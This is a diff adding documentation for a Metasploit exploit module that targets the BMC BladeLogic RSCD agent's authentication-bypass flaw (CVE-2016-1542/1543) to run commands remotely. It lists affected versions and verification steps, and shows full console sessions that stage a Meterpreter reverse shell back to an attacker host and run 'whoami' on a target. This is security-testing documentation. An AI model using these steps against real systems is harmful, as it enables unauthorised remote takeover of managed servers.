|
| 1 | +## Description |
| 2 | +This module exploits a weak access control check in the BMC Server Automation RSCD agent that allows arbitrary operating system commands to be executed without authentication. |
| 3 | + |
| 4 | +Affected versions of the BMC RSCD agent fail to enforce authentication controls at the server side enabling a rogue client to send an authentication message, ignore the response, and continue interacting with the agent as though the authentication was successful. This module takes advantage of this vulnerability to execute arbitrary operating system commands using the BMC network shell (NSH) functionality. |
| 5 | + |
| 6 | +The access control vulnerability itself was identified by Olga Yanushkevich of [ERNW](https://www.ernw.de/) and was assigned [CVE-2016-1542](https://www.cvedetails.com/cve/CVE-2016-1542/) and [CVE-2016-1543](https://www.cvedetails.com/cve/CVE-2016-1543/). Further details can be found at the [ERNW Insinuator website](https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/). |
| 7 | + |
| 8 | +Technical details of the RCE exploit can be found [here](https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/) and [here](https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/). |
| 9 | + |
| 10 | +## Vulnerable Application |
| 11 | +The module affects the RSCD agent component of [BMC BladeLogic Server Automation](http://www.bmcsoftware.uk/it-solutions/bladelogic-server-automation.html). The agent is installed on servers managed using BMC BladeLogic Server Automation and listens on TCP port 4750. The vulnerability affects versions 8.x below 8.6 SP1 Patch 2, 8.7 Patch 3, and 8.8. More details on affected versions and the fix can be found from the [BMC Knowledgebase](https://selfservice.bmc.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA214000000dBpnCAE&type=Solution). |
| 12 | + |
| 13 | +## Verification Steps |
| 14 | +To use this exploit you will need access to BMC BladeLogic Server Automation. |
| 15 | + |
| 16 | +1. Install the RSCD agent on a host as detailed in the [BMC documentation](https://docs.bmc.com/docs/ServerAutomation/89/agent-installation-overview-653394992.html). |
| 17 | +2. Ensure that the RSCD service is running and listening on TCP port 4750. |
| 18 | +3. Launch `msfconsole`. |
| 19 | +4. Load the module `use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce`. |
| 20 | +5. Select the generic command target `set target 3`. |
| 21 | +6. Select a generic command payload `set payload cmd/unix/generic` or `set payload cmd/windows/generic`. |
| 22 | +7. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`. |
| 23 | +8. Run the exploit `exploit`. |
| 24 | + |
| 25 | +The result should be that the string `MSF` is returned and output. |
| 26 | + |
| 27 | +## Usage Scenarios |
| 28 | +The exploit module contains several targets as detailed below. |
| 29 | + |
| 30 | +### Target 0: Automatic |
| 31 | +The automatic target causes the module to issue an `agentinfo` request to the target in an attempt to identify the target operating system. If it appears to be a Windows target then the module behaves as though target 1 was selected, otherwise it behaves as though target 2 was selected. |
| 32 | + |
| 33 | +### Target 1: Windows/VBS Stager |
| 34 | +This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). |
| 35 | + |
| 36 | + msf > use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce |
| 37 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set RHOST 34.239.181.84 |
| 38 | + RHOST => 34.239.181.84 |
| 39 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set LHOST 54.164.112.135 |
| 40 | + LHOST => 54.164.112.135 |
| 41 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set TARGET 1 |
| 42 | + TARGET => 1 |
| 43 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set PAYLOAD windows/meterpreter/reverse_tcp |
| 44 | + PAYLOAD => windows/meterpreter/reverse_tcp |
| 45 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > exploit |
| 46 | + [*] Exploit running as background job 1. |
| 47 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > |
| 48 | + [*] Started reverse TCP handler on 0.0.0.0:4444 |
| 49 | + [*] 34.239.181.84:4750 - Command Stager progress - 8.01% done (8099/101056 bytes) |
| 50 | + [*] 34.239.181.84:4750 - Command Stager progress - 16.03% done (16198/101056 bytes) |
| 51 | + [*] 34.239.181.84:4750 - Command Stager progress - 24.04% done (24297/101056 bytes) |
| 52 | + [*] 34.239.181.84:4750 - Command Stager progress - 32.06% done (32396/101056 bytes) |
| 53 | + [*] 34.239.181.84:4750 - Command Stager progress - 40.07% done (40495/101056 bytes) |
| 54 | + [*] 34.239.181.84:4750 - Command Stager progress - 48.09% done (48594/101056 bytes) |
| 55 | + [*] 34.239.181.84:4750 - Command Stager progress - 56.10% done (56693/101056 bytes) |
| 56 | + [*] 34.239.181.84:4750 - Command Stager progress - 64.11% done (64792/101056 bytes) |
| 57 | + [*] 34.239.181.84:4750 - Command Stager progress - 72.13% done (72891/101056 bytes) |
| 58 | + [*] 34.239.181.84:4750 - Command Stager progress - 80.14% done (80990/101056 bytes) |
| 59 | + [*] 34.239.181.84:4750 - Command Stager progress - 88.16% done (89089/101056 bytes) |
| 60 | + [*] 34.239.181.84:4750 - Command Stager progress - 96.17% done (97188/101056 bytes) |
| 61 | + [*] 34.239.181.84:4750 - Command Stager progress - 100.00% done (101056/101056 bytes) |
| 62 | + [*] Sending stage (179779 bytes) to 34.239.181.84 |
| 63 | + [*] Meterpreter session 1 opened (172.31.58.107:4444 -> 34.239.181.84:56233) at 2018-01-14 00:54:49 +0000 |
| 64 | + |
| 65 | +### Target 2: Unix/Linux |
| 66 | +This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same way as target 1. |
| 67 | + |
| 68 | +### Target 3: Generic Cmd |
| 69 | +This target can be used with *cmd* payloads to execute operating system commands against the target host. |
| 70 | + |
| 71 | + msf > use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce |
| 72 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set RHOST 34.239.181.84 |
| 73 | + RHOST => 34.239.181.84 |
| 74 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set TARGET 3 |
| 75 | + TARGET => 3 |
| 76 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set PAYLOAD cmd/windows/generic |
| 77 | + PAYLOAD => cmd/windows/generic |
| 78 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set CMD "cmd /c whoami" |
| 79 | + CMD => cmd /c whoami |
| 80 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > exploit |
| 81 | + [*] Exploit running as background job 2. |
| 82 | + msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > |
| 83 | + [+] 34.239.181.84:4750 - Output |
| 84 | + ip-ac1f1eb2\bladelogicrscd |
| 85 | + |
| 86 | +#### Windows Hosts |
| 87 | +When using this module target against Windows hosts, non-powershell command lines are limited to around 8,100 characters and generally have to be prefixed with `cmd /c`. |
| 88 | +Powershell commands are executed differently and have a much larger length limit of around 32,700 characters. |
0 commit comments